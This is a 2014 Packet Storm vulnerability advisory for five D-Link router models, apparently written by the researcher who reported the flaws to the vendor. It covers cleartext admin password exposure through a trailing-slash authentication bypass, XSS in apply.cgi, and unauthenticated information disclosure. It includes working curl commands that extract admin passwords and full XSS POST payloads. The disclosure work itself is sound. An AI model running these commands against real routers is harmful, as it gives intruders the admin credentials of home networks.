D-Link Cross Site Scripting / Information Disclosure

2014-05-22T00:00:00
ID PACKETSTORM:126779
Type packetstorm
Reporter Kyle Lovett
Modified 2014-05-22T00:00:00

Description

                                        
                                            `The following five D-Link model routers suffer from several  
vulnerabilities including Clear Text Storage of Passwords, Cross Site  
Scripting and Sensitive Information Disclosure.  
  
DIR-652  
D-Link Wireless N Gigabit Home Router  
  
DIR-835  
D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router  
  
DIR-855L -  
D-Link Wireless N900 Dual Band Gigabit Router  
  
DGL-5500  
D-Link AC1300 Gaming Router  
  
DHP-1565  
D-Link Wireless N PowerLine Gigabit Router  
  
Affected firmware - FW 1.02b18/1.12b02 or older  
  
Access - Remote  
Complexity - Low  
Authentication - None  
Impact - Full loss of confidentiality  
  
-------------------------------------------------------------------------------------------------------------  
Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information  
  
Authentication can be bypassed to gain access to the file  
tools_admin.asp, which stores the devices admin password in plain  
text, by adding a "/" to the end of the URL.  
  
Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:  
  
curl -s http://<IP>/tools_admin.asp/ |awk '/hidden/ &&  
/admin_password_tmp/ && /value/ {print $5}'  
  
PoC for the DHP-1565 and DIR-652, the generic 'user' must be added.  
  
curl -s http://<IP>/tools_admin.asp/ -u user:|awk '/hidden/ &&  
/admin_password_tmp/ && /value/ {print $5}'  
  
-------------------------------------------------------------------------------------------------------------  
Cross Site Scripting - CWE - CWE-79: Improper Neutralization of User  
Input / Return  
  
For the file "apply.cgi" ("apply_sec.cgi" on the DGL-5500) the POST  
param "action" suffers from a XSS vulnerability due to improper  
neutralization of user input / return output.  
  
PoC for DIR-855L, DIR-835, DHP-1565  
  
http://<IP>/apply.cgi  
  
POST  
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D  
HTTP/1.1  
  
For the DGL-5500  
  
http://<IP>/apply_sec.cgi  
  
POST  
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D  
HTTP/1.1  
  
-------------------------------------------------------------------------------------------------------------  
Sensitive Information Disclosure - CWE - CWE-200: Information Exposure  
  
The D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a  
vulnerability which an unauthenticated person can gain access the  
sensitive files:  
  
http://<IP>:8080/hnap.cgi and /HNAP1/ via:  
  
curl -s curl -s http://<IP>:8080/HNAP1/  
  
On the DIR-652 and DHP-1565, a user needs authentication first to  
gain access to these files.  
  
But more importantly, an unauthenticated user can browse directly to  
http://<IP>/cgi/ssi/ which will offer a download of the device's ELF  
MBS MIPS file. The file contains most of the devices internal working  
structure and sensitive information. These particular routers use a  
MSB EM_MIPS Processor and it does contain executable components.  
  
The file can be accessed through at least one known cgi file, however  
there maybe others. Although no known publicly working example exist  
to my knowledge, unpatched devices are susceptible to injection of  
malicious code and most likely susceptible to a payload which could  
deploy a self-replicating worm.  
-------------------------------------------------------------------------------------------------------------  
  
These items were reported to D-Link on April 20th, and to US Cert on  
April 21. D-Link does have patches available for all affected models,  
and it is highly recommended to update the device's firmware as soon  
as possible.  
  
Vendor Links:  
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025  
http://securityadvisories.dlink.com/security/  
  
Research Contact - Kyle Lovett  
May 21, 2014  
`